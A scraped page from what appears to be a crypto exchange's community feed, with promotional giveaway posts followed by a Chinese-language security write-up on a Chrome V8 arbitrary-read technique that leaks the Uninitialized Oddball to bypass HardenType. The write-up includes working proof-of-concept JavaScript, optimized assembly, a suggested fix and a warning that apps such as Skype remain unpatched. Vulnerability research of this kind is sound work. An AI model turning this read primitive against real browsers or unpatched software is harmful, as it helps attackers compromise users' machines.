- 话题
25472 热度
220114 热度
39979 热度
173520 热度
4848 热度
- 置顶
- 🎤 为偶像应援 · Gate送你直达 Token of Love! 🎶
家人们,现在在Gate广场为 打 Token of Love CALL,20 张音乐节门票等你来瓜分!🔥
泫雅 / SUECO / DJ KAKA / CLICK#15 —— 你最期待谁?快来一起应援吧!
📌 参与方式(任选,参与越多中奖几率越高!)
1️⃣ 本帖互动
点赞 & 转发本帖 + 投票你最爱的艺人
评论区打出 “我在 Gate 广场为 Token of Love 打 Call !”
2️⃣ 广场发帖为 TA 打 Call
带上 #歌手名字# + #TokenOfLove#
发帖内容任选:
🎵 最想现场听到的歌 + 心情宣言
📣 应援口号(例:泫雅女王冲鸭!Gate广场全员打 Call!)
😎 自制表情包/海报/短视频(加分项,更容易中奖!)
3️⃣ 推特 / 小红书发帖打 Call
同样带上 #歌手名字# + #TokenOfLove#
内容同上,记得回链到表单 👉️ https://www.gate.com/questionnaire/7008
🎟️ 奖励安排
广场优质发帖用户:8张门票
广场幸运互动用户:2张门票
Twitter 优质发帖用户:5张门票
小红书优质发帖用户:5张门票
📌 优质帖文将根据文章丰富度、热度、创意度综合评分,禁止小号水贴,原创发帖更易获奖!
🕒 8 - ✈️ Gate 广场【Gate Travel 旅行分享官召集令】
广场家人们注意啦!Gate Travel 已经上线~ 机票+酒店一站式预订,还能用加密货币直接付款 💸
所以说,你的钱包和你的旅行梦终于可以谈恋爱了 😎 💕
现在广场开启 #GateTravel旅行分享官# 活动,邀你来秀旅行灵感 & 使用体验!💡
🌴 参与方式:
1️⃣ 在【广场】带话题 #Gate Travel 旅行分享官# 发帖
2️⃣ 你可以:
你最想用 Gate Travel 去的目的地(私藏小岛 or 网红打卡点都行)
讲讲用 Gate Travel 订票/订酒店的奇妙体验
放放省钱/使用攻略,让大家省到笑出声
或者直接写一篇轻松的 Gate Travel 旅行小故事
📦 奖励安排,走起:
🏆 优秀分享官(1 名):Gate 旅行露营套装
🎖️ 热门分享官(3 名):Gate 旅行速干套装
🎉 幸运参与奖(5 名):Gate 国际米兰旅行小夜灯
*海外用户 旅行露营套装 以 $100 合约体验券,旅行速干套装 以 $50 合约体验券折算,国际米兰旅行小夜灯以 $30合约体验券折算。
📌 优质内容将有机会得到官方账号转发翻牌提升社区曝光!
📌 帖文将综合互动量、内容丰富度和创意评分。禁止小号刷贴,原创分享更容易脱颖而出!
🕒 8月20 18:00 - 8月28日 24:00 UTC+
Chrome V8引擎任意读漏洞:利用Uninitialized Oddball绕过HardenType
Chrome v8 HardenProtect绕过技术揭秘
前言
Sentinel value是算法中的一种特殊值,常用于循环或递归算法的终止条件。Chrome源码中存在多种Sentinel value。近期有研究人员通过泄露TheHole对象实现了沙箱内任意代码执行。谷歌团队随后更新了这两个在野CVE的相关信息。
实际上,除TheHole对象外,v8中还有其他不应泄露到JS中的原生对象。本文将讨论Uninitialized Oddball对象,该绕过方法目前仍可用于最新版V8。
值得注意的是,该方法具有一定通用性:
CVE-2021-30551中首次给出了泄露internal uninitialized oddball的poc。
CVE-2022-1486的poc也直接泄露了UninitializedOddball。
一个未分配CVE的Issue也采用了类似方法。
这些案例说明了该问题的普遍性和严重性。
V8中的Sentinel value
V8的大部分原生对象定义在v8/src/roots/roots.h文件中,它们在内存中依次相邻排布。一旦这些不应泄露的原生对象被泄露到Javascript中,就可能实现沙箱内任意代码执行。
我们可以通过修改v8的native函数,将Uninitialized Oddball泄露到JavaScript中。具体方法是修改%TheHole()函数中相对isolate的偏移,使其返回Uninitialized Oddball。
绕过HardenType
该方法的核心代码如下:
javascript function opt(obj, should_bailout) { var x = obj.prop; if (should_bailout) { return x; } return obj[x]; }
function read(obj, offset) { return opt({prop: offset}, false); }
var uninitialized = %TheHole(); var float_array = new Float64Array(1); var int_array = new Int32Array(float_array.buffer);
function hex(i) { return "0x" + i.toString(16).padStart(8,"0"); }
for (var i = 0; i < 0x100; i++) { var res = read(uninitialized, i); float_array[0] = res; console.log(i + ": " + hex(int_array[0]) + " " + hex(int_array[1])); }
该代码在v8-11.0.0中测试仍可实现相对任意读。优化后的read函数关键汇编如下:
0x558b2000407c test byte ptr [rdi+0xb], 0x1 0x558b20004080 jnz 0x558b200040f4 0x558b20004086 mov r11, [rdi+0xf] 0x558b2000408a lea r9, [r11+0xf] 0x558b2000408e and r9, 0xfffffffffffffff8 0x558b20004092 mov r10d, [r9-0x1] 0x558b20004096 cmp edx, r10d 0x558b20004099 jae 0x558b200040f4 0x558b2000409f vmovsd xmm0, [r9+rdx*8+0x7] 0x558b200040a5 vmovq rax, xmm0 0x558b200040aa ret
可以看到,检查了obj的prop属性,但没有检查obj.prop对应的Value,直接按JavaScript语义计算偏移并返回数组值,造成了类型混淆。
建议修复方法是在优化后的函数返回数组元素时,添加对数组map的检查,避免直接计算偏移返回数值。
PatchGap警告
该问题可能存在PatchGap,一些软件如Skype目前仍未修复。在x86架构下,由于没有地址压缩,任意读写是相对于整个进程的。虽然开启了ASLR,但由于文件较大,黑客仍有较大概率读写到关键内容。
这次PatchGap不仅需要排查特定Issue,还导致了一些历史漏洞利用难度大幅降低。建议厂商重视并排查可能受影响的软件。
总结
本文讨论了通过泄露uninitialized_Oddball实现任意读的方法。V8中还有其他Sentinel value可能导致类似问题,值得进一步研究。建议考虑将Sentinel value作为变量加入fuzzer,以挖掘新的利用原语。无论这类问题是否被正式视为安全问题,它都可能大大缩短黑客的完整利用周期。